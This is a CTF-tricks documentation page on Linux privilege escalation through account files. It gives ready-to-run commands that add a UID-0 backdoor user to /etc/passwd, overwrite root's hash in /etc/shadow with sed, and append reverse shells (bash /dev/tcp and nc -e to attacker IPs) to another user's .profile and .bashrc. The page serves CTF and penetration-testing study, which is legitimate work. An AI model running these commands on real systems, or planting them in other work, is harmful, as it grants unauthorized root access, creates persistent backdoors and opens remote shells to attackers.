> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/privilege-escalation-linux-accounts.md).

# Accounts

## Add Root User via Etc/Passwd

To add a new user with root privileges (UID/GID 0) by modifying `/etc/passwd`, you need to append a new line with the user's information.

First, generate an MD5 password hash for the desired password using `openssl`. The `-1` option specifies the MD5-based algorithm for password hashing. You can optionally include a salt using the `-salt` option.

```bash
openssl passwd -1 yourpasswordhere
# Or with a salt:
# openssl passwd -1 -salt mysalt yourpasswordhere
```

Note the resulting hash. Then, using a file write vulnerability or capability, append a line to `/etc/passwd` in the format `username:password_hash:UID:GID:comment:home_directory:shell`. Set UID and GID to `0` for root privileges.

A common method for appending if the file is directly writable is using shell redirection (`>>`).

```bash
# Example appending a user named 'root2' with password hash '$1$Sr6SPqbU$KJaDU1slVE3qNjquFy22K1' (for 'testpass123')
echo 'root2:\$1\$Sr6SPqbU\$KJaDU1slVE3qNjquFy22K1:0:0::/root:/bin/bash' >> /etc/passwd

# Another example adding user 'hacker'
echo 'hacker:\$1\$hacker\$aXF2419/CjX7k4F2yP72N/:0:0::/root:/bin/bash' >> /etc/passwd
```

Replace the password hash and user details as needed. After successful modification, you can authenticate as the new user with the chosen password to gain root access.

***

## Modify Etc Shadow For Root Access

If you find write access to the `/etc/shadow` file, you can gain root access by replacing the root user's password hash with one you control. The `/etc/shadow` file stores password information for user accounts, including the hashed password. Each line in the file corresponds to a user and contains fields separated by colons. The second field contains the password hash.

First, generate a SHA-512 hash for a password you choose (e.g., "password123") using `openssl`:

```bash
openssl passwd -6 password123
# Output will be something like: $6$SaltString$HashedPassword
```

The output format for the SHA-512 hash typically starts with `$6$`, followed by the salt string, and then the hashed password.

Next, edit the `/etc/shadow` file. Find the line starting with `root:` and replace the existing hash field (the second field, between the first and second colons) with the hash generated by `openssl`.

Original line (example):

```
root:$6$SomeSalt$ExistingHash:$DaysLastChanged:0:99999:7:::
```

Modified line:

```
root:$6$SaltString$HashedPassword:$DaysLastChanged:0:99999:7:::
```

You can edit the file manually using a text editor like `vim`. For example, after opening `/etc/shadow` with `vim`, navigate to the root line and replace the hash string.

Alternatively, you can use a command-line tool like `sed` to automate the replacement. Replace `NEW_HASH` with the hash generated by `openssl passwd -6`:

```bash
NEW_HASH=$(openssl passwd -6 password123)
sed -i "s/^root:.*$/root:$NEW_HASH:/" /etc/shadow
```

This command uses `sed` to perform an in-place edit (`-i`) of `/etc/shadow`. It finds the line starting with `root:` (`^root:.*$`) and replaces the entire line up to the second colon with `root:` followed by the `NEW_HASH` and a colon.

Save the file. You can now authenticate as the root user using the password you chose ("password123" in this example).

***

## Privilege Escalation Via Writable .profile

If you find that a target user's `.profile` file is writable by your current user, you can achieve privilege escalation by writing arbitrary commands to this file. These commands will execute with the target user's privileges the next time they log in.

A common method is to append a reverse shell command:

```bash
echo 'bash -c "bash -i >& /dev/tcp/10.6.75.26/4444 0>&1"' >> /home/F30s/.profile
```

This line appends a bash reverse shell payload to `/home/F30s/.profile`. The `.profile` script is sourced (executed) by the shell upon login for interactive sessions. When the user `F30s` next logs in, the injected command will execute, sending a shell back to the attacker's listener (at 10.6.75.26:4444 in this example). This vulnerability is typically discovered by enumerating user home directories for configuration files with weak permissions, allowing writes by other users.

To find such writable configuration files like `~/.bashrc` or `~/.profile`, you can use commands like `find`. For example, to search the entire filesystem for world-writable files, you could use:

```bash
find / -writable -type f 2>/dev/null
```

If any writable user configuration files like `~/.bashrc` or `~/.profile` are found, a malicious command can be added to them, which will be executed when the user logs in. For example, if a user's `.bashrc` is writable, the following line could be added:

```bash
echo "nc -e /bin/bash 192.168.1.10 1234" >> /home/raj/.bashrc
```

Once the user logs in, the injected command, such as the netcat command shown above, will be executed, potentially providing a reverse shell back to the attacker's listening machine (at 192.168.1.10:1234 in this netcat example).
